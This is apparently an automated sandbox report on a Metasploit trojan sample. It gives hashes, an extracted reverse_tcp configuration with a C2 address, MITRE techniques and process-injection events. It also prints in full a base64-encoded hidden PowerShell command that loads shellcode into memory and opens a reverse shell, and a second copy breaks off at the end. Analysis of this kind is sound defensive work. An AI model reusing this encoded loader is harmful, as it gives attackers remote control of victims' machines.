metasploit | ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118

General

Target

ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe
Size

457KB
MD5

92d6ba61a7abad1157873743d8c99ff0
SHA1

7147f50c341b1d51a0454db30c67d75368541c4d
SHA256

ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118
SHA512

b0ef35271d78f34575be5b3aeecfe3698214ac7232b5e22a07edc7cc12073f0754635568e82db8508f9c57c4a846ff9db1bf18a2b1c2bba34343735b05427afe
SSDEEP

6144:8SrEWDl7s5t38dX6pKE4dU7kpoTcnFOHuln+Otc+EkzI8jSejCE8aKP3sGvL4hcJ:8SgbP/GFK9Akld9g/+OuV8IRCw

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.1.36:6060

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2468	powershell.exe
1692	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2468	powershell.exe
1692	powershell.exe
2228	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	2228	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 576 wrote to memory of 2468	576	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe	31
PID 576 wrote to memory of 2468	576	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe	31
PID 576 wrote to memory of 2468	576	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe	31
PID 576 wrote to memory of 2468	576	ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe	31
PID 2468 wrote to memory of 1692	2468	powershell.exe	33
PID 2468 wrote to memory of 1692	2468	powershell.exe	33
PID 2468 wrote to memory of 1692	2468	powershell.exe	33
PID 2468 wrote to memory of 1692	2468	powershell.exe	33
PID 1692 wrote to memory of 2228	1692	powershell.exe	34
PID 1692 wrote to memory of 2228	1692	powershell.exe	34
PID 1692 wrote to memory of 2228	1692	powershell.exe	34
PID 1692 wrote to memory of 2228	1692	powershell.exe	34
PID 2228 wrote to memory of 856	2228	powershell.exe	35
PID 2228 wrote to memory of 856	2228	powershell.exe	35
PID 2228 wrote to memory of 856	2228	powershell.exe	35
PID 2228 wrote to memory of 856	2228	powershell.exe	35
PID 856 wrote to memory of 2880	856	csc.exe	36
PID 856 wrote to memory of 2880	856	csc.exe	36
PID 856 wrote to memory of 2880	856	csc.exe	36
PID 856 wrote to memory of 2880	856	csc.exe	36

C:\Users\Admin\AppData\Local\Temp\ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe
"C:\Users\Admin\AppData\Local\Temp\ac40d0faab088c5c6025608bee2a19e7ca6434d375ba641d25c58dc365cef118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:576
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABxAHEAagBnACAAPQAgACcAJABYAEoARABNACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFgASgBEAE0AIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGUAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBmACwAMAB4AGYANwAsADAAeAA0AGQALAAwAHgAOQBmACwAMAB4ADYAZQAsADAAeAA1AGEALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQBhACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeAAwADIALAAwAHgAYgAxACwAMAB4ADcANwAsADAAeABlAGMALAAwAHgAZQBjACwAMAB4ADQAYQAsADAAeAA4ADgALAAwAHgAOQAxACwAMAB4ADYANQAsADAAeABhAGYALAAwAHgAYgA5ACwAMAB4ADkAMQAsADAAeAAxADEALAAwAHgAYgBiACwAMAB4AGUAYQAsADAAeAAyADEALAAwAHgANQAyACwAMAB4AGUAOQAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADMANgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGIAZgAsADAAeAA5AGUALAAwAHgAMgBkACwAMAB4ADEANQAsADAAeAA3ADUALAAwAHgAZgA4ACwAMAB4ADAAMAAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4ADMAOAAsADAAeAAwADIALAAwAHgAMgA0ACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEANQAsADAAeABmADYALAAwAHgANgAxACwAMAB4AGUANQAsADAAeAA1ADIALAAwAHgAZQBiACwAMAB4ADgAYgAsADAAeABiADcALAAwAHgAMABiACwAMAB4ADYANwAsADAAeAAzADkALAAwAHgAMgA4ACwAMAB4ADMAZgAsADAAeAAzAGQALAAwAHgAOAAxACwAMAB4AGMAMwAsADAAeAA3ADMALAAwAHgAZAAzACwAMAB4ADgAMQAsADAAeAAzADAALAAwAHgAYwAzACwAMAB4AGQAMgAsADAAeABhADAALAAwAHgAZQA2ACwAMAB4ADUAZgAsADAAeAA4AGQALAAwAHgANgAyACwAMAB4ADAAOAAsADAAeABiADMALAAwAHgAYQA1ACwAMAB4ADIAYgAsADAAeAAxADIALAAwAHgAZAAwACwAMAB4ADgAMAAsADAAeABlADIALAAwAHgAYQA5ACwAMAB4ADIAMgAsADAAeAA3AGUALAAwAHgAZgA1ACwAMAB4ADcAYgAsADAAeAA3AGIALAAwAHgANwBmACwAMAB4ADUAOQAsADAAeAA0ADIALAAwAHgAYgAzACwAMAB4ADcAMgAsADAAeABhADAALAAwAHgAOAAyACwAMAB4ADcANAAsADAAeAA2AGQALAAwAHgAZAA3ACwAMAB4AGYAYQAsADAAeAA4ADYALAAwAHgAMQAwACwAMAB4AGUAZgAsADAAeAAzADgALAAwAHgAZgA0ACwAMAB4AGMAZQAsADAAeAA3AGEALAAwAHgAZABiACwAMAB4ADUAZQAsADAAeAA4ADQALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANAA5ACwAMAB4AGIAYQAsADAAeABjAGMALAAwAHgANgBjACwAMAB4ADIANgAsADAAeABjADkALAAwAHgAOABiACwAMAB4ADcAMAAsADAAeABiADkALAAwAHgAMQBlACwAMAB4AGEAMAAsADAAeAA4AGQALAAwAHgAMwAyACwAMAB4AGEAMQAsADAAeAA2ADcALAAwAHgAMAA0ACwAMAB4ADAAMAAsADAAeAA4ADUALAAwAHgAYQAzACwAMAB4ADQAYwAsADAAeABkADIALAAwAHgAYQA0ACwAMAB4AGYAMgAsADAAeAAyADgALAAwAHgAYgA1ACwAMAB4AGQAOQAsADAAeABlADUALAAwAHgAOQAyACwAMAB4ADYAYQAsADAAeAA3AGYALAAwAHgANgBkACwAMAB4ADMAZQAsADAAeAA3AGUALAAwAHgAZgAyACwAMAB4ADIAYwAsADAAeAA1ADcALAAwAHgAYgAzACwAMAB4ADMAZQAsADAAeABjAGYALAAwAHgAYQA3ACwAMAB4AGQAYgAsADAAeAA0ADkALAAwAHgAYgBjACwAMAB4ADkANQAsADAAeAA0ADQALAAwAHgAZQAxACwAMAB4ADIAYQAsADAAeAA5ADYALAAwAHgAMABkACwAMAB4ADIAZgAsADAAeABhAGMALAAwAHgAYQBmACwAMAB4ADEAYQAsADAAeABkADAALAAwAHgANgAyACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAMgBmACwAMAB4ADgAMwAsADAAeAA2ADgALAAwAHgANAAyACwAMAB4AGUAYgAsADAAeABkADcALAAwAHgAMwA4ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgANQA3ACwAMAB4AGQAMwAsADAAeABmAGMALAAwAHgAZQAzACwAMAB4ADgAZAAsADAAeAA0AGUALAAwAHgAZgA3ACwAMAB4ADcAMwAsADAAeABlAGUALAAwAHgAMgA3ACwAMAB4ADAANgAsADAAeABhADcALAAwAHgAOAA2ACwAMAB4ADMANQAsADAAeAAwADkALAAwAHgAYgAwACwAMAB4AGYAYQAsADAAeABiADMALAAwAHgAZQBmACwAMAB4AGUAZQAsADAAeAA1ADIALAAwAHgAOQA0ACwAMAB4AGIAZgAsADAAeAA0AGUALAAwAHgAMAAzACwAMAB4ADUANAAsADAAeAAxADAALAAwAHgAMgA2ACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgANABmACwAMAB4ADUANgAsADAAeAA3ADIALAAwAHgAYgAxACwAMAB4AGYAOAAsADAAeABmAGMALAAwAHgAOQBkACwAMAB4ADYAYwAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADAANwAsADAAeAAzADUALAAwAHgAMgBhACwAMAB4ADAAOQAsADAAeABjADgALAAwAHgAZQAzACwAMAB4ADUANgAsADAAeAAwADkALAAwAHgANAAyACwAMAB4ADAAMAAsADAAeABhADYALAAwAHgAYwA3ACwAMAB4AGEAMwAsADAAeAA2AGQALAAwAHgAYgA0ACwAMAB4AGIAZgAsADAAeAA0ADMALAAwAHgAMwA4ACwAMAB4AGUANgAsADAAeAA2ADkALAAwAHgANQBiACwAMAB4ADkANgAsADAAeAA4AGQALAAwAHgAOQA1ACwAMAB4AGMAOQAsADAAeAAxAGQALAAwAHgAMAA0ACwAMAB4AGMAMgAsADAAeAA2ADUALAAwAHgAMQBjACwAMAB4ADcAMQAsADAAeAAyADQALAAwAHgAMgBhACwAMAB4AGQAZgAsADAAeAA1ADQALAAwAHgAMwBmACwAMAB4AGUAMwAsADAAeAA3ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAwAGMALAAwAHgAOQBhACwAMAB4ADkANwAsADAAeABhADcALAAwAHgANQBhACwAMAB4AGYAMAAsADAAeAA5ADcALAAwAHgAYwBmACwAMAB4ADMAYQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4AGUAYQAsADAAeAA0ADQALAAwAHgANwBkACwAMAB4ADcAOAAsADAAeABhADcALAAwAHgAZAAwACwAMAB4ADcAZQAsADAAeAAyADkALAAwAHgAMQA0ACwAMAB4ADcAMgAsADAAeAAxADcALAAwAHgAZAA3ACwAMAB4ADQAMwAsADAAeABiADQALAAwAHgAYgA4ACwAMAB4ADIAOAAsADAAeABhADYALAAwAHgANAA0ACwAMAB4ADgANAAsADAAeABmAGUALAAwAHgAOABlACwAMAB4ADMAMgAsADAAeABlADQALAAwAHgAYwAyADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABaAHAAWQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAWgBwAFkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFoAcABZACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcQBxAGoAZwApACkAOwAkAHMAdgBQAGwAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAByADAAeABWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHIAMAB4AFYAIAAkAHMAdgBQAGwAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcwB2AFAAbAAgACQAZQAiADsAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABxAHEAagBnACAAPQAgACcAJABYAEoARABNACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFgASgBEAE0AIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGUAOQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBmACwAMAB4AGYANwAsADAAeAA0AGQALAAwAHgAOQBmACwAMAB4ADYAZQAsADAAeAA1AGEALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQBhACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeAAwADIALAAwAHgAYgAxACwAMAB4ADcANwAsADAAeABlAGMALAAwAHgAZQBjACwAMAB4ADQAYQAsADAAeAA4ADgALAAwAHgAOQAxACwAMAB4ADYANQAsADAAeABhAGYALAAwAHgAYgA5ACwAMAB4ADkAMQAsADAAeAAxADEALAAwAHgAYgBiACwAMAB4AGUAYQAsADAAeAAyADEALAAwAHgANQAyACwAMAB4AGUAOQAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADMANgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGIAZgAsADAAeAA5AGUALAAwAHgAMgBkACwAMAB4ADEANQAsADAAeAA3ADUALAAwAHgAZgA4ACwAMAB4ADAAMAAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4ADMAOAAsADAAeAAwADIALAAwAHgAMgA0ACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEANQAsADAAeABmADYALAAwAHgANgAxACwAMAB4AGUANQAsADAAeAA1ADIALAAwAHgAZQBiACwAMAB4ADgAYgAsADAAeABiADcALAAwAHgAMABiACwAMAB4ADYANwAsADAAeAAzADkALAAwAHgAMgA4ACwAMAB4ADMAZgAsADAAeAAzAGQALAAwAHgAOAAxACwAMAB4AGMAMwAsADAAeAA3ADMALAAwAHgAZAAzACwAMAB4ADgAMQAsADAAeAAzADAALAAwAHgAYwAzACwAMAB4AGQAMgAsADAAeABhADAALAAwAHgAZQA2ACwAMAB4ADUAZgAsADAAeAA4AGQALAAwAHgANgAyACwAMAB4ADAAOAAsADAAeABiADMALAAwAHgAYQA1ACwAMAB4ADIAYgAsADAAeAAxADIALAAwAHgAZAAwACwAMAB4ADgAMAAsADAAeABlADIALAAwAHgAYQA5ACwAMAB4ADIAMgAsADAAeAA3AGUALAAwAHgAZgA1ACwAMAB4ADcAYgAsADAAeAA3AGIALAAwAHgANwBmACwAMAB4ADUAOQAsADAAeAA0ADIALAAwAHgAYgAzACwAMAB4ADcAMgAsADAAeABhADAALAAwAHgAOAAyACwAMAB4ADcANAAsADAAeAA2AGQALAAwAHgAZAA3ACwAMAB4AGYAYQAsADAAeAA4ADYALAAwAHgAMQAwACwAMAB4AGUAZgAsADAAeAAzADgALAAwAHgAZgA0ACwAMAB4AGMAZQAsADAAeAA3AGEALAAwAHgAZABiACwAMAB4ADUAZQAsADAAeAA4ADQALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANAA5ACwAMAB4AGIAYQAsADAAeABjAGMALAAwAHgANgBjACwAMAB4ADIANgAsADAAeABjADkALAAwAHgAOABiACwAMAB4ADcAMAAsADAAeABiADkALAAwAHgAMQBlACwAMAB4AGEAMAAsADAAeAA4AGQALAAwAHgAMwAyACwAMAB4AGEAMQAsADAAeAA2ADcALAAwAHgAMAA0ACwAMAB4ADAAMAAsADAAeAA4ADUALAAwAHgAYQAzACwAMAB4ADQAYwAsADAAeABkADIALAAwAHgAYQA0ACwAMAB4AGYAMgAsADAAeAAyADgALAAwAHgAYgA1ACwAMAB4AGQAOQAsADAAeABlADUALAAwAHgAOQAyACwAMAB4ADYAYQAsADAAeAA3AGYALAAwAHgANgBkACwAMAB4ADMAZQAsADAAeAA3AGUALAAwAHgAZgAyACwAMAB4ADIAYwAsADAAeAA1ADcALAAwAHgAYgAzACwAMAB4ADMAZQAsADAAeABjAGYALAAwAHgAYQA3ACwAMAB4AGQAYgAsADAAeAA0ADkALAAwAHgAYgBjACwAMAB4ADkANQAsADAAeAA0ADQALAAwAHgAZQAxACwAMAB4ADIAYQAsADAAeAA5ADYALAAwAHgAMABkACwAMAB4ADIAZgAsADAAeABhAGMALAAwAHgAYQBmACwAMAB4ADEAYQAsADAAeABkADAALAAwAHgANgAyACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAMgBmACwAMAB4ADgAMwAsADAAeAA2ADgALAAwAHgANAAyACwAMAB4AGUAYgAsADAAeABkADcALAAwAHgAMwA4ACwAMAB4AGYAYwAsADAAeABkAGEALAAwAHgANQA3ACwAMAB4AGQAMwAsADAAeABmAGMALAAwAHgAZQAzACwAMAB4ADgAZAAsADAAeAA0AGUALAAwAHgAZgA3ACwAMAB4ADcAMwAsADAAeABlAGUALAAwAHgAMgA3ACwAMAB4ADAANgAsADAAeABhADcALAAwAHgAOAA2ACwAMAB4ADMANQAsADAAeAAwADkALAAwAHgAYgAwACwAMAB4AGYAYQAsADAAeABiADMALAAwAHgAZQBmACwAMAB4AGUAZQAsADAAeAA1ADIALAAwAHgAOQA0ACwAMAB4AGIAZgAsADAAeAA0AGUALAAwAHgAMAAzACwAMAB4ADUANAAsADAAeAAxADAALAAwAHgAMgA2ACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgANABmACwAMAB4ADUANgAsADAAeAA3ADIALAAwAHgAYgAxACwAMAB4AGYAOAAsADAAeABmAGMALAAwAHgAOQBkACwAMAB4ADYAYwAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADAANwAsADAAeAAzADUALAAwAHgAMgBhACwAMAB4ADAAOQAsADAAeABjADgALAAwAHgAZQAzACwAMAB4ADUANgAsADAAeAAwADkALAAwAHgANAAyACwAMAB4ADAAMAAsADAAeABhADYALAAwAHgAYwA3ACwAMAB4AGEAMwAsADAAeAA2AGQALAAwAHgAYgA0ACwAMAB4AGIAZgAsADAAeAA0ADMALAAwAHgAMwA4ACwAMAB4AGUANgAsADAAeAA2ADkALAAwAHgANQBiACwAMAB4ADkANgAsADAAeAA4AGQALAAwAHgAOQA1ACwAMAB4AGMAOQAsADAAeAAxAGQALAAwAHgAMAA0ACwAMAB4AGMAMgAsADAAeAA2ADUALAAwAHgAMQBjACwAMAB4ADcAMQAsADAAeAAyADQALAAwAHgAMgBhACwAMAB4AGQAZgAsADAAeAA1ADQALAAwAHgAMwBmACwAMAB4AGUAMwAsADAAeAA3ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAwAGMALAAwAHgAOQBhACwAMAB4ADkANwAsADAAeABhADcALAAwAHgANQBhACwAMAB4AGYAMAAsADAAeAA5ADcALAAwAHgAYwBmACwAMAB4ADMAYQAsADAAeABhADAALAAwAHgAYwBiACwAMAB4AGUAYQAsADAAeAA0ADQALAAwAHgANwBkACwAMAB4ADcAOAAsADAAeABhADcALAAwAHgAZAAwACwAMAB4ADcAZQAsADAAeAAyADkALAAwAHgAMQA0ACwAMAB4ADcAMgAsADAAeAAxADcALAAwAHgAZAA3ACwAMAB4ADQAMwAsADAAeABiADQALAAwAHgAYgA4ACwAMAB4ADIAOAAsADAAeABhADYALAAwAHgANAA0ACwAMAB4ADgANAAsADAAeABmAGUALAAwAHgAOABlACwAMAB4ADMAMgAsADAAeABlADQALAAwAHgAYwAyADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABaAHAAWQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAWgBwAFkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFoAcABZACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcQBxAGoAZwApACkAOwAkAHMAdgBQAGwAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAByADAAeABWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB